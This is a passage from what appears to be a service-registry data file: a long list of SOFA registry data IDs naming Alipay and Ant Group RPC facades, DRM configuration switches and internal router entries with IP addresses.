AULT_GROUP","com.koubei.kbposprod.common.service.facade.api.ShopOrderCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.OrderLinkSyncArService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antlink.tuling.common.service.schema.SchemaMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushDeviceReadCzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.switchDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicore.common.service.facade.bundleapp.api.BundleAppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.sendmsg.CensorSendDingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.MaintenanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:p2p.res.template.default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ValidationService:1.0:mydds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.spread.InfluenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.trade.api.ProductTradeInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.ucdp.UcdpDeliverGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_CURE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_192.168.3.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleRouteStrategy.simpleable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:inshealthclaimmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.abos.AbosContractPerformanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.keyMetaMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.179.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.dchaincustomer.facade.api.user.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.trsdesk.common.service.facade.biz.StopMeasureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.127.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_SG_SERVERLESS_3.0_TEST_CUSTOMPARAM@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.fund.api.item.ReconcileItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.PhysicalMountDimTableOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.integration.biscenter.UEMOperationPermissionServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.232.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.mif.common.service.facade.org.OrganizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductWithPropertiesService:1.0:cfpcenterSpecialcheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.infra.vfs.FileStorage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.ItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.ABTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.config.cache.CacheManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CONSUMEX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.apshopcenter.common.service.facade.ShopAuditDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoscene.facade.virtualprofit.api.VirtualProfitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketMessageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.DailyCutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_dmpservice_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bic.common.service.facade.BioMetaDataService:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.PartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","csbizcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csaccurate.service.facade.mng.api.DataModelQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.pool.ResourcePoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_closeContractProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.morphodatatwa.api.ConditionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.manage.api.PayChannelDecisionManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardRfdInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.DsdbPageRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferAttrGroupManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pkgcore.common.service.facade.PackageQueryForOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.migrate.PriceMigrateInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.generate.GeneratorOrderDRMResource.subTaskSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antscheduler.facade.IAntJobItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zfundcheck.common.service.facade.spark.SparkSqlTaskClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.BCCampManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.SysParamConfigMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.grmcore.common.service.facade.sla.GrmServiceLevelAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcredittrans.facade.baitiao.api.BtctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.family.FamilyRelationInviteQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_acwareslifecore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofabootrpcdemo.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdEntityOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.MbaprodConfigResource.mbaprodUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprod.service.PcreditOrgAgreementHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.commom.service.facade.CpPicPathFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-twatest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinSysParamRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.mavenConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.capability.payments.NotifyPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.dandan.facade.ExceptionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundapplication.common.service.facade.api.equity.EquityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.merchant.MerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ikbservcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zskynet.facade.alarmcheck.BizEmcDcCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:dssd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-ichecker-service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afx.tr.server.facade.two:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zqualitypivot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbprod.common.service.facade.user.service.VipCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AlCorpChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.AppApplyManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.principal.PrincipalRoleChangeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.publish.PublishRecordApi:1.0:dataphin-publishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybBuytimesTairFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:igausscn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.PublishTaskPlanIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconsume.common.service.facade.order.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.MerchantCommodityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterUprcSrcMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:clearDeductApplySplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.scene.ServerlessSceneFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.merchant.BankCardValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydatacore.common.service.facade.ActiveServiceRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.isvoperation.IsvOperationOrgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-charthubtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.InstCreditEnhancementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBBalancePurchaseLimitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyoptprod.common.service.facade.api.journey.CrowdExportStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphae.common.facade.project.IConnectProject:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.UserInvoiceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.PrometheusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ApplyFlowChargeoffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.ForseeQueryTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.facade.api.SiteMemberJoinFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.TryFundActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.MemberComponentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxworks.service.facade.CommonSerialQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.224.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.top.InsTbUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.AstcIgnoredDailyDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.payeetag.PayeeTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tdlib.common.manager.facade.ApdidOdpsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.process.ProcessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.109.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:ALI_MERCHANTCARD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.221.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.securityops.common.service.client.service.SecOpsClientChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.toutiaoPropagationLevelMid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.budgetMonitorSetting,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sdabombardier.common.service.facade.relationship.IotDeviceAppIdShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alideviceinfo.common.service.spi.service.DeviceCallbackService:1.0:mobilecodec_facePayOpen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit.RecruitPlanManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:${28923030-65465363}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditamount.service.PcreditAmountConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.ArticleFavoriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:appSpiderCenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbprod.common.service.facade.trade.service.TransactionDateCaculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zpdcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.ccr.facade.ldc.drm.LDCUidRangeResource.ldcUidRangeStr,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.exceptionana.ClientPerfLegoAlarmAnalysisTotalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY@gmcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.70.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.161.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocommopt.common.service.facade.u2u.api.ShareRightManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.PromoContentRecmdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.RedPacketQrcodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:superRepayCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:ebppcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.wagu.api.VIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.headline.HeadlineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_support_mainCategoryGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.user.UserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.finpwm.mobileDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprocess.facade.service.StrategyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.ops.api.OpRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_XZY_SERVERLESS_TASK_STREAM_TIMEOUT_FUNC@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditcore.service.facade.trans.CreditInstructionFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appxcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.DecisionSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.CertificateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.SecurityChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fccryptprod:name=com.alipay.fc.cryptprod.common.service.client.drm.FcCryptProdClientCacheRefreshResource.refreshTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodcore.service.api.service.ServiceConfigureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcmt_member_template_online_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.15.229.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kborderprod.KopRefundGoodsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundcore.common.service.facade.FundUserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ProjectDailyReportFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.web.task.rpc.facade.activity.TransferCodeActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinstecoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ecquery.common.service.cmd.RepayCmdQueryFacade:1.0:repayCmdQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.shadowMethodConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.28.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:scardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.core.service.event.EventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.SwitchCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.upload.PhotoUploadManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.185.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:zmmif-cache-remove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.community.CommunityContentAccessMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:bxfinmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.orderm